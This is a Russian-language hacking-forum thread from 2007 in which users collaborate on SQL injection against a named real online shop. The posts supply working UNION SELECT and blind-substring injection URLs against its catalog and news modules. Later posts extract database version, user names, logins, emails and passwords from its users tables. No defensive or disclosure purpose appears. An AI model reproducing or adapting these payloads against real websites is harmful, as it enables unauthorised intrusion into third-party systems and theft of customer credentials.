HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Скуль
  #1  
Старый 13.10.2007, 15:23
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
С нами: 10182506

Репутация: 1393


По умолчанию Скуль

http://www.acasashop.md/?module=catalog&id=9999991'+union+select+0,1,2,3,4/*


Помогите плз перебрать к-во столбцов, а то не выходит у меня
 
Ответить с цитированием

  #2  
Старый 13.10.2007, 15:42
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

У тебя заруб идёт на предварительном запрос, не на том, который выводится. Если бы ты был упорнее, ты бы нашёл модуль, где нету никаких предварительных запросов, ака "посчитать количество чего-либо" или "взять имя чего-то где модуль=чему-то". Например в модуле news есть SQL-Injection с выводом:

Цитата:
http://www.acasashop.md/?module=news&cmd=view&id=-16'+UNION+SELECT+1,2,3,CONCAT_WS(0x3a,USER(),VERSI ON(),DATABASE()),5,6/*
 
Ответить с цитированием

  #3  
Старый 13.10.2007, 15:45
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

опередил.... лано от себя добавлю, что в модуле catalog можно пользовать подзапросы:
пример:
Код:
http://www.acasashop.md/?module=catalog&id=11'%20and%20ascii(substr((select%20version()),1,1))=52/*
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #4  
Старый 13.10.2007, 15:47
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
С нами: 10182506

Репутация: 1393


По умолчанию

Спс большое, плюсеги поставил )
 
Ответить с цитированием

  #5  
Старый 13.10.2007, 15:58
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами: 10305026

Репутация: 187
По умолчанию

ну и я добавлю

http://www.acasashop.md/?module=news&cmd=view&id=-16'+UNION+SELECT+1,concat(name,char(58),login),ema il,CONCAT_WS(0x3a,USER(%20),VERSION(),DATABASE()), password,6%20from%20users/*

Последний раз редактировалось kair; 13.10.2007 в 16:08..
 
Ответить с цитированием

  #6  
Старый 13.10.2007, 16:05
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами: 10393869

Репутация: 2032


По умолчанию

вы скули ищете тулзами или ручками?
 
Ответить с цитированием

  #7  
Старый 13.10.2007, 16:10
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

Piflit, есть скули, которые ни одна тулза не найдёт, когда для каждой нужен индивидуальный подход, поэтому я предпочитаю прямые ручки в противовес прогам.
 
Ответить с цитированием

  #8  
Старый 13.10.2007, 16:11
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
С нами: 10182506

Репутация: 1393


По умолчанию

Я ручьками )
 
Ответить с цитированием

  #9  
Старый 13.10.2007, 16:14
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами: 10305026

Репутация: 187
По умолчанию

и еще одна табличка)
http://www.acasashop.md/?module=news&cmd=view&id=-16'+UNION+SELECT+1,password,3,4,name,6%20from%20ie system_acasashop.users/*
 
Ответить с цитированием

  #10  
Старый 13.10.2007, 16:27
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

kair, да ты потрошишь одну и ту же табличку... )))
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.